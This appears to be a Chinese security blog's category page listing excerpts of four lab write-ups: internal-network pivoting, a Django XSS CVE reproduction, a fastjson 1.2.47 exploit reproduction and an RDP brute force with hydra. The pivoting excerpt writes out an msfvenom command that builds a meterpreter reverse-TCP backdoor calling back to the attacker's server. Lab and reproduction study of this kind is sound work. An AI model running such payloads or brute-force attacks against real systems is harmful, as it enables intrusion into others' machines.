信息安全
文章平均质量分 63
一个想一直摆烂的小白
这个作者很懒,什么都没留下…
展开
-
内网渗透(一)反向代理实现外网访问到内网
msfvenom -p windows/meterpreter/reverser_tcp LHOST=你的云服务器ip LPORT=3333(端口自定) -f exe > msf.exe ,生成的后门放到a虚拟机中。总结:首先攻击端(服务器)攻击具有内网和外网的虚拟机,取得权限,然后进行对另一台在同一内网的虚拟机进行渗透,通过开启隧道(也就是建立节点),让宿主机连接作为跳板的攻击机,来实现访问另一台内网上的虚拟机。攻击机(服务器)使用msf生成后门,放到a虚拟机中,点开与运行上线。原创 2023-08-02 20:41:24 · 1357 阅读 · 0 评论 -
Django1.11.4 XSS漏洞复现(CVE-2017-12794)
Django是重量级选手中最有代表性的一位。首先定义了dj错误类型数组,以及获取了db的错误类型,判断出现错误类型是否在db的错误类型中,如果存在,则将dj.exc.value.__cause__=exc.value (图上没有可能是因为在1.11.5版本下),直接将错误的值传给__cause__,而在500页面中会输出__cause__的值。docker启动vluhub中的CVE-2017-12794的漏洞环境。新版本1.11.5,修复了1.11.4中500页面中可能存在的一个XSS漏洞。原创 2023-07-20 11:40:57 · 312 阅读 · 0 评论 -
fastjson1.2.47漏洞复现
在前后端数据传输交互中,经常会遇到字符串(String)与json,XML等格式相互转换与解析,其中json以跨语言,跨前后端的优点在开发中被频繁使用,基本上可以说是标准的数据交换格式。相比1.2.24,1.2.47过滤了许多恶意类的上传姿势以及关闭了autoType,例如双写等绕过,但是并不阻挡hacker的攻击脚步,发现在fastjson中有一个全局缓存,当有类进行加载时,如果autoType没开启,会尝试从缓存中获取类,如果缓存中有,则直接返回。浏览器输入ip:端口。原创 2023-07-05 11:45:07 · 830 阅读 · 0 评论 -
记录一次用kali爆破RDP(远程连接协议)
首先win7下win+R打开regedit.exe,进入后找到并进入目录HKEY_LOCAL_MACHINE\System\CurrentControiSet\Control\TerminalServer\WinStations\RDP-Tcp,在右侧找到PortNumber,双击编辑端口设置为3389(当然你想要修改其他的端口也行),十进制,并重启。使用kali自带的工具hydra进行爆破,这里字典使用的是kali自带的字典,具体位置看图。发现端口3389,如果没有,可以自行开启并进行测试。原创 2023-06-14 11:02:52 · 4023 阅读 · 1 评论